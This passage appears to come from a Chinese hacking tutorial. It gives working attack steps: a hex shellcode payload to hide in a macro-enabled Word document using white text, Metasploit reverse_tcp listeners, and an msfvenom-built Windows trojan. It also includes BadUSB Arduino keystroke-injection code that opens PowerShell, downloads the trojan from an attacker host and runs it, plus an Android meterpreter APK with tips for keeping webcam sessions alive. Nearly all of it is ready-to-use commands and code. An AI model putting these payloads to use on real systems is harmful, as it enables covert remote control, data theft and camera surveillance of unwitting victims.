&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H2C&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H54&H30&H00&H00&H38&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H30&H00&H00&H00&H00&H00&H00&H9C&H00&H45&H78&H69&H74&H50&H72&H6F&H63&H65&H73&H73&H00&H00&H00&H00&H30&H00&H00&H4B&H45&H52&H4E&H45&H4C&H33&H32&H2E&H64&H6C&H6C&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H93&H8C&H31&H17&H42
将此段复制到文档中保存(可以选择将其字体颜色变为白色来隐藏)
另存为
另存为启用宏的Word文档(*.docm)
Kali开启监听
msfconsole use multi/handler set payload windows/meterpreter/reverse_tcp set lhost Kali的IP set lport 监听端口 run
反弹成功接收到
meterpreter>
?可以查看可以执行的命令
后台执行cmd
execute -H -i -f cmd.exe
2.BadUSB
MSF制作反弹shell木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=Kali的IP LPORT=Kali的端口 -f exe R > system.exe
放到/var/www/html目录下
开启Kali的Apache服务
service apache2 start
浏览器输入Kali的IP/system.exe查看下载是否部署成功
成功则进行下一步:
需要软件Arduino和开发板
输入如下代码:
#include <Keyboard.h> void setup() { // put your setup code here, to run once: Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_CAPS_LOCK);//开启大写锁 Keyboard.release(KEY_CAPS_LOCK); delay(50); Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI);//按住win+R Keyboard.release('r'); Keyboard.print("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1");//输入cmd Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN);//回车 delay(500); Keyboard.press(KEY_CAPS_LOCK);//开启大写锁 Keyboard.release(KEY_CAPS_LOCK); delay(50); Keyboard.print("powershell");//启动powershell Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN);//回车 delay(1000); Keyboard.print("$client = new-object System.Net.WebClient");//设置为下载器 Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN);//回车 delay(500); Keyboard.print("$client.DownloadFile('http://192.168.60.131/system', 'd:\\system.exe')");//下载文件 Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN);//回车 delay(1000); Keyboard.print("exit");//执行脚本 Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN);//回车 delay(500); delay(1000); Keyboard.print("exit");//执行脚本 Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN);//回车 delay(500); Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI);//按住win+R Keyboard.release('r'); Keyboard.print("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1");//输入cmd Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN);//回车 delay(500); Keyboard.print("start d:\\system.exe");//执行脚本 Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN);//回车 delay(500); Keyboard.print("exit");//执行脚本 Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN);//回车 Keyboard.end(); } void loop() { // put your main code here, to run repeatedly: }
保存为文件
选择开发板版本
点击上传
插入开发板
下方会显示上传成功后拔出
制作完成。
Kali开启监听 windows/meterpreter/reverse_tcp
插谁谁上线。
注意:
输入法切换到英文输入法
3.Android远控木马
MSF制作安卓反弹shell木马
msfvenom -p android/meterpreter/reverse_tcp LHOST=Kali的IP LPORT=Kali的监听端口 R > system.apk
手机给所有权限安装,点击
Kali开启监听
msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST 192.168.*.*(Kali的IP,注意不可写loopback127.0.0.1) set LPORT 4444 exploit
有的手机得到session的一会儿后会自动断开,这里我的解决办法是刚获得session就马上执行webcam_stream或者webcam_chat、webcam_snap等调用摄像头的命令。主要是为了使手机保持活动状态,自己测试时可以尝试使手机不要锁屏就不会断。
